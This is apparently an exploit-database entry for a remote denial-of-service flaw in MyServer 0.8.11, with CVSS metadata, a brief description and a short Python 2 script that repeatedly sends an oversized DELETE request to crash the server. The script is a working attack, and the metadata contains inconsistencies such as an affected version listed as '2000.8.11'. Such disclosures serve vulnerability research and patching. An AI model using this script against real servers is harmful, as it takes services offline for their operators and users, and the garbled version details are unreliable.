MyServer 0.8.11 "204 No Content" error Remote Denial of Service

vendor:

MyServer

by:

shinnai

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: MyServer

Affected Version From: 2000.8.11

Affected Version To: 2000.8.11

Patch Exists: YES

Related CWE: N/A

CPE: a:myserverproject:myserver:0.8.11

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2008

MyServer 0.8.11 “204 No Content” error Remote Denial of Service

MyServer 0.8.11 is vulnerable to a remote denial of service attack. By sending a specially crafted DELETE request with an overly long string, a remote attacker can cause the service to crash. This vulnerability can be exploited using other HTTP methods such as GET, OPTIONS, etc.

Mitigation:

Upgrade to the latest version of MyServer 0.8.11 or later.

Source

Exploit-DB raw data:

#exploit.py

import socket
import os

print '------------------------------------------------------------------'
print ' MyServer 0.8.11 "204 No Content" error Remote Denial of Service'
print ' url: www.myserverproject.net'
print ' author: shinnai'
print ' mail: shinnai[at]autistici[dot]org'
print ' site: http://shinnai.altervista.org'
print ' I do not have time for explanations, just to say that yuo can'
print ' use even other HTTP methods as GET, OPTIONS etc :-)'
print '------------------------------------------------------------------'

buff = "A" * 50
host = "127.0.0.1"
port = 80

for i in range (0,20):
    try:
        connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        connection.connect((host, port))
        connection.send("DELETE" + buff + " HTTP/1.0\r\n")
    except:
        print "Unable to connect"

# milw0rm.com [2008-02-25]